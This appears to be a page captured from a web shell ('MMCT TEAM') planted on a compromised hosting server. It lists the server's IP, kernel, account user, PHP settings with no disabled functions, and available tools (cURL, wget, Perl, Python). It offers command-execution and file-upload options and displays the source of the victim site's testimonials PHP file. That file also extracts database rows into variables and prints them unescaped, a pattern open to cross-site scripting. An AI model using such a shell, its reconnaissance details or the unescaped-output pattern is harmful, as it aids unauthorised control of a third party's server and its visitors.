MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.144.101.75
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/vermaborewell.co.in/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/vermaborewell.co.in/index-testimonials.php
<?php
$sql_testimonial=db_query("select * from tbl_testimonial where 1 and test_status='Active' order by test_id desc");
if(mysqli_num_rows($sql_testimonial)>0){
?>
<section class="divider parallax layer-overlay overlay-dark" data-stellar-background-ratio="0.5" data-bg-img="images/bg/bg5.jpg">
  <div class="container pb-50">
    <div class="row">
      <div class="col-md-8 col-md-offset-2">
        <div class="testimonial-carousel fullwidth text-center dot-theme-colored">
          <?php
while($TEST_DATA=mysqli_fetch_array($sql_testimonial)){
@extract($TEST_DATA);
?>
          <div class="item">
            <div class="thumb">
              <?php if($TEST_DATA['test_image_name']!=""){?>
              <img src="<?=$site_url?>/test_images/<?=$TEST_DATA['test_image_name']?>" title="<?=$TEST_DATA['test_comp_name']?>" alt="<?=$TEST_DATA['test_comp_name']?>" width="90" >
              <?php }?>
            </div>
            <div class="content">
              <p>
                <?=substr(strip_tags($TEST_DATA['test_description']),0,250)?>
              </p>
              <h5 class="author text-theme-colored">
                <?=$TEST_DATA['test_given_by']?>
              </h5>
              <h6 class="title text-white">
                <?=$TEST_DATA['test_comp_name']?>
              </h6>
            </div>
          </div>
          <?php
}
?>
        </div>
      </div>
    </div>
  </div>
</section>
<? } ?>

MMCT - 2023